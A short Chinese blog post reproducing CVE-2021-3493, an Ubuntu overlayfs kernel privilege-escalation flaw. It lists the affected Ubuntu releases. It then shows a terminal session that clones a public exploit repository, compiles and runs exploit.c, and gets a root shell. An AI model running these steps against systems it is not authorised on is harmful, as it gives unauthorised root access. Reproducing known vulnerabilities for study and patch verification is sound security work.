CVE-2021-3493漏洞复现

时间：2021-04-29 09:53:08 阅读：28 评论：0 收藏：0 [点我收藏+]

漏洞简介

Linux 内核中 overlayfs 文件系统是 Ubuntu 的特定问题，由于没有正确的验证文件系统功能在用户名称空间中的应用，从而导致攻击者可以安装一个允许未授权挂载的 overlayfs 修补程序来提升权限

影响版本

ubuntu 20.04

ubuntu 16.04

ubuntu18.04

ubuntu 14.04

本次复现为ubuntu20.04版本

漏洞复现

test@linux:~# git clone https://github.com/ASkyeye/CVE-2021-3493.git
test@linux:~$ cd CVE-2021-3493/
test@linux:~/CVE-2021-3493$ gcc exploit.c -o exploit
test@linux:~/CVE-2021-3493$ chmod u+x exploit
test@linux:~/CVE-2021-3493$ ./exploit
bash-5.0$ whoami
root

CVE-2021-3493漏洞复现

原文：https://www.cnblogs.com/hxlinux/p/14716060.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)